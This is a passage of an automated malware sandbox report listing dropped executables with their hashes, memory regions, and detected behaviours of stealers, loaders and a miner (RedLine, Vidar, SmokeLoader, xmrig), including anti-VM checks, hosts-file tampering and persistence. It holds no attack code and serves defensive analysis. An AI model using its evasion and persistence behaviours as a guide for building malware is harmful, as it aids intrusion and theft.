SHA1 aab2040bc51ecb0dd2678f44c68cfbd722704a28
SHA256 912719650b5facfcb89b623b32a58780426cb4c9d36761c50a80c73bf783e94c
SHA512 5fa99e666d2006afffef54ec87ba347c28881d64c47c995788e291e1cd9048231ab620a30ed89ca3e04ebaf19737685ed4165473521f99f44b318499a9aa66d4

C:\ProgramData\4390821.exe

MD5 d3502a1369d09902d246e5a172bda5e6
SHA1 aab2040bc51ecb0dd2678f44c68cfbd722704a28
SHA256 912719650b5facfcb89b623b32a58780426cb4c9d36761c50a80c73bf783e94c
SHA512 5fa99e666d2006afffef54ec87ba347c28881d64c47c995788e291e1cd9048231ab620a30ed89ca3e04ebaf19737685ed4165473521f99f44b318499a9aa66d4

memory/3388-249-0x00000000000B0000-0x00000000000B1000-memory.dmp

memory/5000-245-0x0000000000A80000-0x0000000000A82000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

MD5 d75734d85b59bdb7202e3c4b9def3631
SHA1 e6f713d88cce2df494095342e6734ea3cf59df0d
SHA256 600df54efe0bcdd1b2c7c8de1b821ff20d7ccc702479793324fc93ca7fd7a91c
SHA512 270b14765e24afacf7328fa409b59d5102bdd13d18968845796eb31e487f45118d34244c2c1f737c539ba612fd0dba0d1d08488debe2b7859f2d4b3d45810311

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

MD5 d75734d85b59bdb7202e3c4b9def3631
SHA1 e6f713d88cce2df494095342e6734ea3cf59df0d
SHA256 600df54efe0bcdd1b2c7c8de1b821ff20d7ccc702479793324fc93ca7fd7a91c
SHA512 270b14765e24afacf7328fa409b59d5102bdd13d18968845796eb31e487f45118d34244c2c1f737c539ba612fd0dba0d1d08488debe2b7859f2d4b3d45810311

memory/476-251-0x0000000000000000-mapping.dmp

C:\ProgramData\8981631.exe

MD5 068565654f0bbe81d602e7afa851201d
SHA1 108c21228fedab58d897af46c7bd0e57438ccf3e
SHA256 d55d5c14f6759edcded7cd9ec5d6cc430abc90ebe07224b599a26449d241b73d
SHA512 4bac7eb52e8f40511f462bacce5cb80f8b43d8f76c7331b0908b36a4c372bd483f050d1fff34cff3c5a360fb49ad32869225d0d0eb1097df80d05181646ca68a

memory/476-256-0x0000000000DA0000-0x0000000000DA1000-memory.dmp

memory/3128-257-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe

MD5 93460c75de91c3601b4a47d2b99d8f94
SHA1 f2e959a3291ef579ae254953e62d098fe4557572
SHA256 0fdba84fe8ed2cf97023c544d3f0807dbb12840c8e7d445a3a4f55174d78b5b2
SHA512 4370ae1a1fc10c91593839c51d0fbae5c0838692f95e03cac315882b026e70817b238f7fe7d9897049856469b038acc8ccfd73aae1af5775bfef35bde2bf7856

C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe

MD5 93460c75de91c3601b4a47d2b99d8f94
SHA1 f2e959a3291ef579ae254953e62d098fe4557572
SHA256 0fdba84fe8ed2cf97023c544d3f0807dbb12840c8e7d445a3a4f55174d78b5b2
SHA512 4370ae1a1fc10c91593839c51d0fbae5c0838692f95e03cac315882b026e70817b238f7fe7d9897049856469b038acc8ccfd73aae1af5775bfef35bde2bf7856

memory/3128-261-0x00000000007D0000-0x00000000007D1000-memory.dmp

memory/4224-268-0x0000000000550000-0x0000000000551000-memory.dmp

memory/476-267-0x00000000055F0000-0x00000000055F4000-memory.dmp

memory/476-270-0x0000000008360000-0x0000000008361000-memory.dmp

C:\ProgramData\6069887.exe

MD5 b1ef16d34497d921e4cd574fff8965e4
SHA1 3b959651330acccd31e5646575c889a3861bdcda
SHA256 3776ad134256d78e535c3fc72e576d91f58f80f26c7e69f0d5cd8f6648a40ef8
SHA512 d033ca7c732cb63cc0557760589372f53aeada5d1eb735aab2072823f2cadd2bdb3ae412682e4f1ab40dd4b805424b9580d9ff46d51a6f123de1e32b84ef11f6

memory/4224-277-0x0000000000D10000-0x0000000000D11000-memory.dmp

memory/476-276-0x0000000007DB0000-0x0000000007DB1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2.exe

MD5 3bef291868337302198597f1e49e11cb
SHA1 705a5efb3feddf5758c0ff3ff27f8dc2c78ccd64
SHA256 7b8d7b971e0505f5ebfd9c726e8435878c6077ce2b235f2f647f7b5c21c2980b
SHA512 85d96a08642d0ef59312c275c33dfdf5db3eb4b3fbfd48ec88d590cf28a2debe86b415d830fa8c3f87386ac788448887aef1b1911728e82a5b778d3f458730df

memory/3388-279-0x000000001ACC0000-0x000000001ACC2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2.exe

MD5 3bef291868337302198597f1e49e11cb
SHA1 705a5efb3feddf5758c0ff3ff27f8dc2c78ccd64
SHA256 7b8d7b971e0505f5ebfd9c726e8435878c6077ce2b235f2f647f7b5c21c2980b
SHA512 85d96a08642d0ef59312c275c33dfdf5db3eb4b3fbfd48ec88d590cf28a2debe86b415d830fa8c3f87386ac788448887aef1b1911728e82a5b778d3f458730df

memory/4220-281-0x0000000000D20000-0x0000000000D21000-memory.dmp

memory/4376-274-0x0000000000040000-0x0000000000041000-memory.dmp

memory/4220-273-0x0000000000000000-mapping.dmp

C:\ProgramData\6069887.exe

MD5 b1ef16d34497d921e4cd574fff8965e4
SHA1 3b959651330acccd31e5646575c889a3861bdcda
SHA256 3776ad134256d78e535c3fc72e576d91f58f80f26c7e69f0d5cd8f6648a40ef8
SHA512 d033ca7c732cb63cc0557760589372f53aeada5d1eb735aab2072823f2cadd2bdb3ae412682e4f1ab40dd4b805424b9580d9ff46d51a6f123de1e32b84ef11f6

memory/4376-266-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe

MD5 926fbc9261cf783ea941891e0644c0c5
SHA1 d90c0f8a499dcf2a7d5a92c316f2b736d999f7d3
SHA256 bfc101337c0065cd9f844ce03b3db348940a28acd6cbb5e0c0adf230c2850805
SHA512 91b4de74719f538dbe92eec6dcae0f4453adc2626adaee0d1ce705f97ed2fe9d47e6f25f7e692c0383a11a9c6812ca1bcd59274eb71b1de9584a3aefb10da49f

C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe

MD5 926fbc9261cf783ea941891e0644c0c5
SHA1 d90c0f8a499dcf2a7d5a92c316f2b736d999f7d3
SHA256 bfc101337c0065cd9f844ce03b3db348940a28acd6cbb5e0c0adf230c2850805
SHA512 91b4de74719f538dbe92eec6dcae0f4453adc2626adaee0d1ce705f97ed2fe9d47e6f25f7e692c0383a11a9c6812ca1bcd59274eb71b1de9584a3aefb10da49f

memory/4224-262-0x0000000000000000-mapping.dmp

C:\ProgramData\8981631.exe

MD5 068565654f0bbe81d602e7afa851201d
SHA1 108c21228fedab58d897af46c7bd0e57438ccf3e
SHA256 d55d5c14f6759edcded7cd9ec5d6cc430abc90ebe07224b599a26449d241b73d
SHA512 4bac7eb52e8f40511f462bacce5cb80f8b43d8f76c7331b0908b36a4c372bd483f050d1fff34cff3c5a360fb49ad32869225d0d0eb1097df80d05181646ca68a

memory/1324-253-0x0000000008350000-0x0000000008351000-memory.dmp

memory/4224-284-0x0000000000D20000-0x0000000000D3B000-memory.dmp

memory/3388-252-0x0000000000870000-0x000000000088E000-memory.dmp

memory/5212-285-0x0000000000000000-mapping.dmp

memory/4376-286-0x0000000004B10000-0x0000000004B11000-memory.dmp

memory/5272-287-0x0000000000000000-mapping.dmp

memory/5360-292-0x0000000000000000-mapping.dmp

C:\ProgramData\149669.exe

MD5 24b616181ced5319d412c8981e75b465
SHA1 99a13762fb38fdcb7b38696cf131b796c1daaa2f
SHA256 de7db98b76b2062580ba948d1690399c345993636991e25c640c30800920eb02
SHA512 976a88284835bba914a397d2de89669a24ab3859ac9d94f0e8c4ed8203ad1496404ef7d426a35c628f3b4b58b3ed6c72f0f23386e1ffa5703a1c5843a5844cb2

memory/4224-290-0x0000000000D40000-0x0000000000D41000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 234fad127f21b6119124e83d9612dc75
SHA1 01de838b449239a5ea356c692f1f36cd0e3a27fd
SHA256 32668075f8c859636cb19de60d5ddc6e4fa1bfbc94eb6504636946d641110876
SHA512 41618ad70dc6296200471ce85be320502425730b84cb3b92f9295725746c024593811c61addc4c15c1a3d51227e50e159bc09c8d75b6029476c5b8afaacba002

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 234fad127f21b6119124e83d9612dc75
SHA1 01de838b449239a5ea356c692f1f36cd0e3a27fd
SHA256 32668075f8c859636cb19de60d5ddc6e4fa1bfbc94eb6504636946d641110876
SHA512 41618ad70dc6296200471ce85be320502425730b84cb3b92f9295725746c024593811c61addc4c15c1a3d51227e50e159bc09c8d75b6029476c5b8afaacba002

memory/1324-293-0x00000000083E0000-0x00000000083E1000-memory.dmp

memory/4220-294-0x000000001B990000-0x000000001B992000-memory.dmp

C:\ProgramData\149669.exe

MD5 24b616181ced5319d412c8981e75b465
SHA1 99a13762fb38fdcb7b38696cf131b796c1daaa2f
SHA256 de7db98b76b2062580ba948d1690399c345993636991e25c640c30800920eb02
SHA512 976a88284835bba914a397d2de89669a24ab3859ac9d94f0e8c4ed8203ad1496404ef7d426a35c628f3b4b58b3ed6c72f0f23386e1ffa5703a1c5843a5844cb2

C:\ProgramData\3313646.exe

MD5 2cd5c4ee42e61a0f770d43f8f9ca558f
SHA1 ac2878f25ce42de9d73278a2fecf73565b2f4dfe
SHA256 ee621d8e9638c6f298c5d323a7eb5138f6f9c656f8125c692c602422098683af
SHA512 1ca622e5f06b3fb299ddb7658251f580768bc9e45a1ac0a228a7ce1c318dfbd8103eb155137e8c8fb6255b93cbc4fa49f0540b321add9d3a6b82bc776ae1197d

memory/4376-303-0x00000000048A0000-0x00000000048B8000-memory.dmp

memory/5600-308-0x0000000000000000-mapping.dmp

memory/5360-307-0x0000000000F40000-0x0000000000F41000-memory.dmp

memory/5560-312-0x0000000000400000-0x0000000000414000-memory.dmp

memory/4376-322-0x0000000004AA0000-0x0000000004AA3000-memory.dmp

memory/6108-335-0x0000000000000000-mapping.dmp

memory/6116-334-0x0000000000000000-mapping.dmp

memory/6116-342-0x0000000000690000-0x0000000000691000-memory.dmp

memory/6108-341-0x00000000021A0000-0x00000000021A1000-memory.dmp

memory/5664-339-0x00000000053C0000-0x00000000053C1000-memory.dmp

memory/5192-338-0x0000000000000000-mapping.dmp

memory/904-340-0x0000000000000000-mapping.dmp

memory/5360-337-0x0000000005A90000-0x0000000005A91000-memory.dmp

memory/5896-336-0x0000000000400000-0x0000000000414000-memory.dmp

memory/3388-333-0x000000001C130000-0x000000001C131000-memory.dmp

memory/3388-331-0x000000001BA30000-0x000000001BA31000-memory.dmp

memory/5664-345-0x0000000004E50000-0x0000000004E51000-memory.dmp

memory/5136-343-0x0000000000000000-mapping.dmp

memory/5748-327-0x0000000000800000-0x0000000000801000-memory.dmp

memory/5664-329-0x0000000000400000-0x0000000000401000-memory.dmp

memory/5896-325-0x0000000000000000-mapping.dmp

memory/5360-324-0x00000000058E0000-0x00000000058FB000-memory.dmp

memory/5832-323-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\sqlite.dll

MD5 14ef50a8355a8ddbffbd19aff9936836
SHA1 7c44952baa2433c554228dbd50613d7bf347ada5
SHA256 fde50eea631c01d46cbb95b6f4c2a7c834ce77184552f788242c5811ed76b8f9
SHA512 ccddf7b0610bcae4395a6aae7c32d03f23a40328b68d9f0246361e1af0d401ee444f178310910d15e7dbd3706a89ae4e5b7adbd972e1f50cd5a77515612f76dc

memory/5748-320-0x0000000000000000-mapping.dmp

memory/5664-319-0x0000000000400000-0x0000000000422000-memory.dmp

memory/5716-317-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\udptest.exe

MD5 f1cd08ca29a2add76e5b0464750c645b
SHA1 929de2a20f5d82b333f95213c955e90e2e0fc66c
SHA256 0cb33bdee818c06cd3e34b8b3a2a0f4120bd91527ef87406f4086bd2841ef5ec
SHA512 4ae6b8729b1ff8061839c0ba8f5a13ce50e5746fab4ed4fadd2e2aab1a9ad31198ca31d8748d64f7011a361e253b29ca2b4112ad201c670fb38f95b5068c6687

memory/5664-316-0x0000000000000000-mapping.dmp

memory/5688-315-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\sqlite.dll

MD5 14ef50a8355a8ddbffbd19aff9936836
SHA1 7c44952baa2433c554228dbd50613d7bf347ada5
SHA256 fde50eea631c01d46cbb95b6f4c2a7c834ce77184552f788242c5811ed76b8f9
SHA512 ccddf7b0610bcae4395a6aae7c32d03f23a40328b68d9f0246361e1af0d401ee444f178310910d15e7dbd3706a89ae4e5b7adbd972e1f50cd5a77515612f76dc

C:\Users\Admin\AppData\Local\Temp\setup_2.exe

MD5 3f85c284c00d521faf86158691fd40c5
SHA1 ee06d5057423f330141ecca668c5c6f9ccf526af
SHA256 28915433217ce96922b912651ae21974beba3a35aab6c228d5e96e296c8925dc
SHA512 0458856a88a11d259595c9c9ec105131c155fffb9c039b492e961b6aaf89ecec4e2d057fd6a2305f55303e777e08346a437dc22741ed288fb84d6d37b814d492

C:\Users\Admin\AppData\Local\Temp\setup_2.exe

MD5 3f85c284c00d521faf86158691fd40c5
SHA1 ee06d5057423f330141ecca668c5c6f9ccf526af
SHA256 28915433217ce96922b912651ae21974beba3a35aab6c228d5e96e296c8925dc
SHA512 0458856a88a11d259595c9c9ec105131c155fffb9c039b492e961b6aaf89ecec4e2d057fd6a2305f55303e777e08346a437dc22741ed288fb84d6d37b814d492

memory/4376-306-0x00000000049D0000-0x0000000004F76000-memory.dmp

memory/5560-304-0x0000000000000000-mapping.dmp

memory/4224-305-0x000000001B310000-0x000000001B312000-memory.dmp

memory/1272-302-0x0000000003500000-0x00000000035D1000-memory.dmp

memory/1324-299-0x00000000089A0000-0x00000000089A1000-memory.dmp

memory/3224-298-0x0000000001890000-0x0000000001899000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\udptest.exe

MD5 f1cd08ca29a2add76e5b0464750c645b
SHA1 929de2a20f5d82b333f95213c955e90e2e0fc66c
SHA256 0cb33bdee818c06cd3e34b8b3a2a0f4120bd91527ef87406f4086bd2841ef5ec
SHA512 4ae6b8729b1ff8061839c0ba8f5a13ce50e5746fab4ed4fadd2e2aab1a9ad31198ca31d8748d64f7011a361e253b29ca2b4112ad201c670fb38f95b5068c6687

C:\ProgramData\3313646.exe

MD5 2cd5c4ee42e61a0f770d43f8f9ca558f
SHA1 ac2878f25ce42de9d73278a2fecf73565b2f4dfe
SHA256 ee621d8e9638c6f298c5d323a7eb5138f6f9c656f8125c692c602422098683af
SHA512 1ca622e5f06b3fb299ddb7658251f580768bc9e45a1ac0a228a7ce1c318dfbd8103eb155137e8c8fb6255b93cbc4fa49f0540b321add9d3a6b82bc776ae1197d

memory/5428-296-0x0000000000000000-mapping.dmp

memory/6116-355-0x0000000004FE0000-0x0000000005266000-memory.dmp

memory/5664-358-0x0000000004DA0000-0x00000000053B8000-memory.dmp

memory/4548-356-0x0000000000000000-mapping.dmp

memory/5136-369-0x000000001BA50000-0x000000001BA52000-memory.dmp

memory/5192-371-0x0000000005700000-0x0000000005701000-memory.dmp

memory/5944-368-0x0000000000000000-mapping.dmp

memory/6016-376-0x0000000000000000-mapping.dmp

memory/1324-382-0x0000000004C15000-0x0000000004C17000-memory.dmp

memory/5212-379-0x0000000002C40000-0x0000000002C6F000-memory.dmp

memory/4548-384-0x0000000005380000-0x0000000005381000-memory.dmp

memory/5144-387-0x0000000000000000-mapping.dmp

memory/4796-391-0x0000000000000000-mapping.dmp

memory/5280-396-0x0000000000000000-mapping.dmp

memory/5576-398-0x0000000000000000-mapping.dmp

memory/1188-395-0x0000000000000000-mapping.dmp

memory/6016-389-0x0000000004B30000-0x00000000050D6000-memory.dmp

memory/5728-400-0x0000000000000000-mapping.dmp

memory/2988-401-0x0000000000000000-mapping.dmp

memory/5248-404-0x0000000000000000-mapping.dmp

memory/5776-408-0x0000000000000000-mapping.dmp

memory/5728-421-0x00000000048C0000-0x00000000048C1000-memory.dmp

memory/1324-418-0x000000007FCE0000-0x000000007FCE1000-memory.dmp

memory/5280-433-0x0000000005610000-0x0000000005C28000-memory.dmp

memory/5428-434-0x0000000004740000-0x0000000004770000-memory.dmp

memory/476-437-0x0000000000000000-mapping.dmp

memory/5308-439-0x0000000000000000-mapping.dmp

memory/5308-442-0x00000000025F0000-0x00000000025F1000-memory.dmp

memory/5308-444-0x0000000004AF0000-0x0000000004C3B000-memory.dmp

memory/5308-445-0x0000000004D00000-0x0000000004DB6000-memory.dmp

memory/4828-446-0x0000000000000000-mapping.dmp

memory/5140-460-0x0000000000000000-mapping.dmp

memory/5140-465-0x0000000000400000-0x0000000000416000-memory.dmp

memory/5132-471-0x00000000022F0000-0x00000000022F1000-memory.dmp

memory/2996-469-0x0000000001500000-0x0000000001502000-memory.dmp

memory/4372-472-0x0000000001070000-0x0000000001072000-memory.dmp

memory/4804-478-0x0000000000970000-0x0000000000972000-memory.dmp

memory/3128-480-0x0000000001170000-0x0000000001172000-memory.dmp

memory/4804-491-0x0000000000972000-0x0000000000974000-memory.dmp

memory/4804-492-0x0000000000974000-0x0000000000975000-memory.dmp

memory/4804-495-0x0000000000975000-0x0000000000977000-memory.dmp

memory/4372-493-0x0000000001074000-0x0000000001075000-memory.dmp

memory/4372-496-0x0000000001076000-0x0000000001077000-memory.dmp

memory/4372-497-0x0000000001075000-0x0000000001076000-memory.dmp

memory/3720-578-0x0000000002940000-0x0000000002942000-memory.dmp

memory/3964-577-0x000000001C7F0000-0x000000001C7F2000-memory.dmp

memory/2400-584-0x0000000140000000-0x0000000140763000-memory.dmp

memory/2400-587-0x0000000001300000-0x0000000001320000-memory.dmp

memory/2400-588-0x0000000001320000-0x0000000001340000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2021-09-11 20:41

Reported

2021-09-11 21:12

Platform

win10v20210408

Max time kernel

1801s

Max time network

1803s

Command Line

c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe

RedLine

infostealer redline

RedLine Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

ServHelper

trojan backdoor servhelper

SmokeLoader

trojan backdoor smokeloader

Socelars

stealer socelars

Socelars Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Vidar

stealer vidar

rl_trojan

stealer
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Checks for common network interception software

evasion

Grants admin privileges

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\is-1MTC6.tmp\46807GHF____.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat19e6a852f849bb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat196ac06a9e6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat19e4750dd01.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat19ba05e89ea6d406.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat19c6762a08beae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat19f84b58b3d7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat191649b47c9e2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat1946eb84e6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat199ba8a4637dcb034.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-1UMBU.tmp\Sat19ba05e89ea6d406.tmp N/A
N/A N/A C:\ProgramData\1768932.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
N/A N/A C:\ProgramData\8592089.exe N/A
N/A N/A C:\ProgramData\2701259.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\ProgramData\5651654.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udptest.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_2.exe N/A
N/A N/A C:\ProgramData\6583285.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3002.exe N/A
N/A N/A C:\ProgramData\2701259.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-NC4QN.tmp\setup_2.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jhuuee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_2.exe N/A
N/A N/A C:\ProgramData\3158303.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3002.exe N/A
N/A N/A C:\ProgramData\7749113.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-S5KLF.tmp\setup_2.tmp N/A
N/A N/A C:\ProgramData\8836247.exe N/A
N/A N/A C:\ProgramData\2110516.exe N/A
N/A N/A C:\ProgramData\8836247.exe N/A
N/A N/A C:\ProgramData\2731835.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-D9E1S.tmp\postback.exe N/A
N/A N/A C:\Program Files\MSBuild\NUKMIWBYRX\ultramediaburner.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\42-72a2b-82f-4be9c-46d7cc66408df\Lujisisidae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DKOK5.tmp\ultramediaburner.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\40-3f9f7-1c3-4b9b6-c9a45ef328b90\Xafaevushyme.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE N/A
N/A N/A C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44qkxlxz.pmh\GcleanerEU.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1zjetqv2.51k\anyname.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\rdhcu2sn.5ph\gcleaner.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\KPzSScVqZ.exe N/A
N/A N/A C:\ProgramData\EMGKK6Y07HFVSXJ4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EA22.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FAFC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\l70tT9AqV.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DniSJJFfB.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\vhsgwrt N/A
N/A N/A C:\Users\Admin\AppData\Roaming\vhsgwrt N/A
N/A N/A C:\Users\Admin\AppData\Roaming\vhsgwrt N/A

Modifies RDP port number used by Windows

Sets DLL path for service in the registry

persistence

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\EA22.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\EA22.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\42-72a2b-82f-4be9c-46d7cc66408df\Lujisisidae.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat19e6a852f849bb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat19e6a852f849bb2.exe N/A
